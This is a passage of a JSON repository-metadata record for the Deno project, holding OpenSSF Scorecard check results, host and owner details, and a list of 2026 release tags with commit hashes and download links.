https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v